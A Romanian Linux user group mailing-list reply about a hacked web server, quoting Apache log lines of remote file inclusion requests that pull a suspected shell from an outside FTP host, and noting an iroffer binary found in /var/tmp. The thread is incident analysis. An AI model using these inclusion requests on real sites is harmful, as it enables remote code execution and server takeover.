[EMAIL PROTECTED] wrote:
[xx/Jan/2008:03:43:16 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200
13360 "-" "libwww-perl/5.805"
[xx/Jan/2008:03:43:23 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200
13360 "-" "Mozilla/5.0"
[xx/Jan/2008:03:51:39 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200
13360 "-" "libwww-perl/5.805"
[xx/Jan/2008:03:51:46 +0200] "GET /index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200
13360 "-" "Mozilla/5.0"
Am gasit in /var/tmp/ executabilul iroffer cu owner apache
iroffer is a software program that acts as a fileserver for IRC. It is
similar to a FTP server or WEB server, but users can download files
using the DCC protocol of IRC instead of a web browser.
Probabil ca prin asta isi aducea mai departe ce dorea.
Eu nu as fi asa sigur ca doar asta putea sa faca.
Ia acceseaza tu
http://site-ul-tau/index.php?pg=ftp://80.50.253.90/upload/trop/old? si
vezi,ce se intampla.
Banuiesc ca este un shell.
--
Teddy
_______________________________________________
RLUG mailing list
RLUG@lists.lug.ro
http://lists.lug.ro/mailman/listinfo/rlug